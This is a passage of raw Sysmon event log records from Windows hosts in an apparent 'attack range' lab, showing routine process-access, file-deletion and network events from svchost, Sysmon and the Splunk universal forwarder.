11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298016Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298015Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298014Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298013Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000298012Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.459{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A851D6E95614D9D51870747F2225DE2,SHA256=CF571510240CA2443391C2FF43AEAEA2B3067D29396782CC2B9DF6590994C4C5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221916Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:46.076{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51682-false10.0.1.12-8089- 23542300x8000000000000000221915Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:47.900{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE689DA461AE9859C18DFEE98838C86B,SHA256=9BCC1EBA3A6FF53BDEC000B54C5C1D9A52BF53562473405FC584DC4E8AC145E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221914Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:47.900{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6AF2B4E8C7742F3CF14E3AD5EDB32F6D,SHA256=29365ABD4058A6D8F1652685E77EBF678AE0C1CCC27D1D322BE474217B7559E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221913Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:47.531{4F8D34B0-1853-6216-2705-000000003902}33481616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000298054Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:47.675{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EC4697AF2262C1EE1D97A70612933B9,SHA256=971E09CFC9290B6BDE40F77484EA3535CC7C4B321728A3FC2E21586F3400EEDF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221912Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:47.275{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1853-6216-2705-000000003902}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221911Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:47.275{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221910Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:47.275{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221909Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:47.275{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221908Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:47.275{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221907Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:47.275{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221906Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:47.275{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221905Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:47.275{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221904Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:47.275{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221903Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:47.275{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221902Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:47.275{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1853-6216-2705-000000003902}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221901Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:47.275{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1853-6216-2705-000000003902}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221900Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:47.276{4F8D34B0-1853-6216-2705-000000003902}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298055Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:48.675{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FE7BC79D368D9D0E2134AA1FE0C9912,SHA256=62391C4A31677023E913D357B3105C45BE0965F28D9BCA91482DE1D34918F7CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221917Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:48.572{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A911EA5B27B315C0F1E6618C89C12F6E,SHA256=D9E9FC6012A862AAEB44E29D6E5DDCE1C6AE8C9F1DDD4654865FA704977057F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298056Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:49.694{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A8466A8A3456100D7D995417FD4C776,SHA256=BDCB7C7618B2727C05B30E16B05B339C5C4D60419C31EFBE8D09ABBC084B6100,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221946Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.869{4F8D34B0-1855-6216-2905-000000003902}3200524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221945Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.666{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1855-6216-2905-000000003902}3200C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221944Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.666{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221943Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.666{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221942Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:49.666{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 